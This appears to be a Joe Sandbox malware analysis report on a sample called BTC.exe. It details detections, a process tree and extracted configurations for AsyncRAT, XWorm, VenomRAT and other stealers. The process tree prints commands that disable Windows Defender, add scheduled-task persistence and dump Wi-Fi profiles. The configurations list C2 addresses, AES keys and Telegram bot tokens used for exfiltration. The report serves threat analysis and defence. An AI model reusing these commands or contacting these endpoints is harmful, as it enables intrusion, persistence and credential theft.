Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BTC.exe

Overview

General Information

Sample name:BTC.exe
Analysis ID:1503194
MD5:f1424e5b9810a4a9c33506aa784fca89
SHA1:4ad6287fe149832551afbcb1113db50cd133777b
SHA256:8a3da2a07e82bf22f3cd239de861b2b8c50c9fe9ee2ba12a33564e1b5cc93fed
Tags:exe
Infos:

Detection

AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected Rezlt
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected VenomRAT
Yara detected Vermin Keylogger
Yara detected WorldWind Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Creates files with lurking names (e.g. Crack.exe)
Disables Windows Defender (via service or powershell)
Disables Windows Defender Tamper protection
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Protects its processes via BreakOnTermination flag
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BTC.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\BTC.exe" MD5: F1424E5B9810A4A9C33506AA784FCA89)
    • crack.exe (PID: 5972 cmdline: "C:\Users\user\AppData\Roaming\crack.exe" MD5: 9215015740C937980B6B53CEE5087769)
      • cmd.exe (PID: 2352 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5560 cmdline: timeout 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • Cracked.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Roaming\Cracked.exe" MD5: 0DFA83A82F6418C73406D78296DE61BE)
      • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5556 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 3480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5340 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • svchost.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 96014694A042D8344B910BC47D79337B)
      • cmd.exe (PID: 6392 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5024 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8748 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 8944 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8700 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 9000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 2584 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 7436 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • update.exe (PID: 1632 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: B8DF7316CC35A0FB6FE3A326B4283010)
      • cmd.exe (PID: 7152 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5036 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8800 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • findstr.exe (PID: 8892 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8872 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 5332 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
        • netsh.exe (PID: 8508 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • Conhost.exe (PID: 8872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Window Security.exe (PID: 2680 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
      • schtasks.exe (PID: 5800 cmdline: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Windows Security.exe (PID: 5352 cmdline: "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
        • schtasks.exe (PID: 7060 cmdline: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5580 cmdline: "powershell" Get-MpPreference -verbose MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8764 cmdline: C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\* MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • Windows Defender Service Host.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" MD5: 5322A12CB24E83BFA9746FBDE06D07E7)
      • schtasks.exe (PID: 5520 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Window Security.exe (PID: 320 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
    • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7196 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • PING.EXE (PID: 616 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
      • Window Security.exe (PID: 6772 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
        • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7696 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • PING.EXE (PID: 8176 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
          • Window Security.exe (PID: 8464 cmdline: "C:\Users\user\AppData\Roaming\Window Security.exe" MD5: 81B2C5C64951B603480D40D321540FF2)
            • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 2452 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • PING.EXE (PID: 8820 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Vermin Keylogger

{"Version": "2.1.0.0", "Host:Port": "146.190.29.250:7812;", "SubDirectory": "SubDir34", "InstallName": "Windows Security.exe", "MutexName": "VNM_MUTEX_h1gQxrpyccCFZq7JPS", "StartupKey": "Windows Update", "Tag": "Office04", "LogDirectoryName": "Logs"}

Threatname: Xworm

{"C2 url": ["146.190.29.250", "165.227.91.90", "167.99.94.206"], "Port": "7812", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148"}

Threatname: VenomRAT

{"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 310366, "from": {"id": 5904946097, "is_bot": true, "first_name": "Vilva789", "username": "Vilva814bot"}, "chat": {"id": 5881759996, "first_name": "BTC USDT", "last_name": "FLASH\ud83d\udd25", "username": "flashusdtbtcsender", "type": "private"}, "date": 1725336958, "text": "This Not RDP"}}]}

Threatname: AsyncRAT

{"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
    sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x9372:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x940f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9524:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8ece:$cnc4: POST / HTTP/1.1
          C:\Users\user\AppData\Roaming\Cracked.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            C:\Users\user\AppData\Roaming\Cracked.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
            • 0xf8d0:$q1: Select * from Win32_CacheMemory
            • 0xf910:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
            • 0xf95e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
            • 0xf9ac:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
            Click to see the 53 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x9172:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x920f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x9324:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x8cce:$cnc4: POST / HTTP/1.1
                00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                  00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    Click to see the 53 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    2.0.crack.exe.440000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.0.crack.exe.440000.0.unpackJoeSecurity_RezltYara detected RezltJoe Security
                        0.2.BTC.exe.2c80488.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.2.BTC.exe.2c80488.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0x7572:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
